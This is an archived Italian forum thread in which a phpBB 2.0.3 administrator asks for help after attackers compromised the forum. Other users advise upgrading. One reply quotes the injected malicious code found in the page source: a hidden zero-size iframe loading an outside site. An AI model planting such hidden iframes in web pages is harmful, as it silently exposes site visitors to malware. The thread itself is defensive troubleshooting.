PDA

Visualizza la versione completa : hacking phpbb


faiel
25-10-2005, 01:54
Qualcuno entrato nel mio server ed ha postato nel forum un virus (credo tramite cookies) che viene vbloccato dall' antivirus.
Lo si pu vedere accedendo a questa pagina:
http://www.fulleffect.it/forum
Qualcuno ha qualche consiglio da darmi su dove poterlo trovare e rimuoverlo ?

l.golinelli
25-10-2005, 09:58
Che versione hai?

faiel
25-10-2005, 10:25
phpBB 2.0.3

l.golinelli
25-10-2005, 11:24
per... aggiornare phpbb un must... ha un casino di problemi si sicurezza...

Guglie
25-10-2005, 18:01
c' un bug in php 2.0.17 (l'ultima versione) causato da IE; i devel devono ancora fixarlo, ma nel forum di gentoo per sicurezza hanno temporaneamente disabilitato gli avatar

http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038109.html

EDIT: cmq dal titolo pensavo che volessi modificare phpBB, non che qualcuno avesse crakkato il tuo phpBB.. :incupito:

faiel
25-10-2005, 21:38
Il mio phpbb totalmente modificato, per questo non posso eseguire facilmente gli update....
Non c un luogo preciso dove poter andare a rimuovere facilmente il virus ?

eraser
26-10-2005, 00:03
<iframe src="http://mycashpay.org/" width=0 height=0></iframe>

nel sorgente html della pagina che hai postato vedo questo richiamo.... qui il tuo virus :)

taita
26-10-2005, 00:37
Originariamente inviato da faiel
Il mio phpbb totalmente modificato, per questo non posso eseguire facilmente gli update....
Non c un luogo preciso dove poter andare a rimuovere facilmente il virus ?
Modificato in che senso? Nel template?
Perch navigandoci un po', non ho visto MOD installati.

Comunque sei indietro 14 versioni: io ti consiglio un rapido upgrade.

faiel
26-10-2005, 03:31
modificato in varie parti, non con mod, ma con modifiche personali in modo da rendere il db di phpbb copmpatibile con tutto il resto del sito...

taita
26-10-2005, 23:22
Non credo che il db sia cambiato dalla versione 2.0.3 alla attuale.

Prova ad informarti sul forum ufficiale di phpbb.com.

Loading